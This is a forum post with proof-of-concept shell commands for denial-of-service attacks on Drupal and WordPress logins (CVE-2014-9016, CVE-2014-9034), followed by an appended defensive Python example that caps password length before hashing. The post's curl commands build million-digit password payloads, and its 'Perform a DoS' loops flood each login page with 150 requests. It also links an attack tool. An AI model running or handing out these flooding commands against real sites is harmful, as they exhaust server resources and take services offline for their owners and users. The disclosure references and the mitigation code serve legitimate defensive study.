devilox

CVE-2014-9016 and CVE-2014-9034 Drupal & Wordpress Denial of Service


Drupal Denial of Service CVE-2014-9016

Generate a payload and try with a non-valid user:


$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload

$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Generate a payload and try with a valid user:


$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

$ time curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Perform a DoS with a valid user:


$ for i in `seq 1 150`; do (curl --data valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done

Wordpress Denial of Service CVE-2014-9034

Generate a payload and try with a non-valid user:


$ echo -n "log=NO-VALID-USER&pwd=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&wp-submit=Log In" >> no_valid_user_payload

$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &

Generate a payload and try with a valid user:


$ echo -n "log=admin&pwd=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&wp-submit=Log In" >> valid_user_payload

$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &

Perform a DoS with a valid user:


$ for i in `seq 1 150`; do (curl --data valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done

Python Code

https://github.com/c0r3dump3d/wp_drupal_timing_attack

References

Wordpress Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep

Drupal Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep

Timing Attack and the importance of controlling the length of the input – The Case of Drupal CVE-2014-9016. | # /dev/console

https://wordpress.org/news/2014/11/wordpress-4-0-1/

https://www.drupal.org/SA-CORE-2014-006

https://www.drupal.org/node/2378367

NVD - Detail

NVD - Detail

Source : CVE-2014-9016 and CVE-2014-9034 Proof of Concept ~ Hacking while you're asleep

Edited by devilox
  • Upvote 1
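
Both issues in the post above come from a login handler that hashes a password of any length, which is the point of the referenced write-up on controlling input length. The following is an added example, not code from the post, from Drupal or WordPress, or from the linked tool: a simplified iterated hash stands in for the CMS password hasher, and `MAX_PASSWORD_BYTES`, `ITERATIONS` and all function names are assumptions chosen for illustration. It shows the unbounded check beside one that rejects oversized input before any hashing.

```python
import hashlib
import hmac
import time

MAX_PASSWORD_BYTES = 512   # assumed cap for this example, not taken from the page
ITERATIONS = 2048          # assumed stretch count, kept small so the demo is quick


def stretch(password: bytes, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    """Iterated hash that feeds the password into every round, so the
    work is proportional to iterations * len(password)."""
    digest = hashlib.sha512(salt + password).digest()
    for _ in range(iterations):
        digest = hashlib.sha512(digest + password).digest()
    return digest


def verify_unbounded(password: bytes, salt: bytes, expected: bytes) -> bool:
    """'Before': hashes whatever length the client sent."""
    return hmac.compare_digest(stretch(password, salt), expected)


def verify_capped(password: bytes, salt: bytes, expected: bytes,
                  max_len: int = MAX_PASSWORD_BYTES) -> bool:
    """'After': oversized input is rejected before any hashing happens."""
    if len(password) > max_len:
        return False
    return hmac.compare_digest(stretch(password, salt), expected)


def timed(fn, *args):
    """Return (result, seconds) for one call."""
    start = time.perf_counter()
    result = fn(*args)
    return result, time.perf_counter() - start


if __name__ == "__main__":
    salt = b"constructed-salt"                 # constructed sample values
    stored = stretch(b"correct horse", salt)
    oversized = b"1" * 200_000                 # stand-in for a very long password
    for name, fn in (("unbounded", verify_unbounded), ("capped", verify_capped)):
        ok, secs = timed(fn, oversized, salt, stored)
        print(f"{name:9s} oversized -> accepted={ok} time={secs:.4f}s")
        ok, secs = timed(fn, b"correct horse", salt, stored)
        print(f"{name:9s} normal    -> accepted={ok} time={secs:.4f}s")
```

The capped check returns in roughly constant time for oversized input, while the unbounded check's time grows with the length of the submitted password.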
